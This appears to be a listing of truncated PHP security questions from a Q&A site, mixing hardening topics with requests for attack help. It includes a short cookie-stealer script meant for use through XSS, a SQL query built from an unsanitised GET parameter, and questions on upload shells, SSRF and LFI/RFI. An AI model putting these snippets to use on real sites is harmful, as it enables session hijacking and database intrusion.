Collaborate Disseminate
It is important to note that this user input will undergo validation and sanitation using regex (on the server side in PHP) and then will be inserted into a database. Later it would be shown to other users on the same web sit… Continue reading Should user input be validated for its length in PHP (server side) as a security measure?
Is there any reason why PHP files would require write access? (Excluding directories that need to be writable)
I’m installing Magento via composer. They recommend the following permissions:
cd /var/www/html/<magento inst… Continue reading Is there any reason why PHP files require write permissions?
I’m building a website and am trying to figure out a way to encrypt the user’s email addresses. It would be nice if, in case my database was stolen, the emails of my users weren’t in plain text. I figured the user needs the e… Continue reading Encrypting email addresses in php
So I found a file uploader on example.com. The file uploader accepts every file extension and the file is uploaded inside the directory
/temp/random-numeric-id.php
I tried to upload a php file and it got uploaded, however w… Continue reading How can I inject real php code into this website?
Some site I am testing that retrieves data from some url, I could backconnect using ldaps://ip:port/
I tried wrappers like ldap://, dict:// but only ldaps seem to work.
Also expect:// seem disabled, same as sftp://
The sit… Continue reading SSRF to RCE or get it to print the out of file://?
I’m currently migrating the encryption functionality used in a PHP project from mcrypt (which was deprecated in PHP 7.1.x and no longer works from PHP 7.2 onward) to openssl, using the defuse/php-encryption library.
I’ve a php code where I get the page number from a GET request and then run a sql query to select records from the database by the page number
$maxPerPage = 20;
$page = $_GET[“p”];
$applicants = DB::query(‘SELECT * FROM re… Continue reading How can this sql query be injected?
I know that there are many problems with xammp that could allow someone to hack into my computer however I don’t know how to prevent it. I have the default settings on xammp so far. What should I do?
Here is my cookie_stealer.php file :
header (‘Location:https://google.com’);
$cookies = $_GET[“c”];
$file = fopen(‘log.txt’, ‘a’);
fwrite($file, $cookies . “\n\n”);
I Inject this code into an XSS vulnerable text entry :
I am completing some online labs to do with cybersecurity and I have been given the task of dealing with a virtual machine of kali linux, to access a basic ip for a website called “yellow”. we access it using an ip, our VM do… Continue reading How to open a shell using LFI or RFI exploits?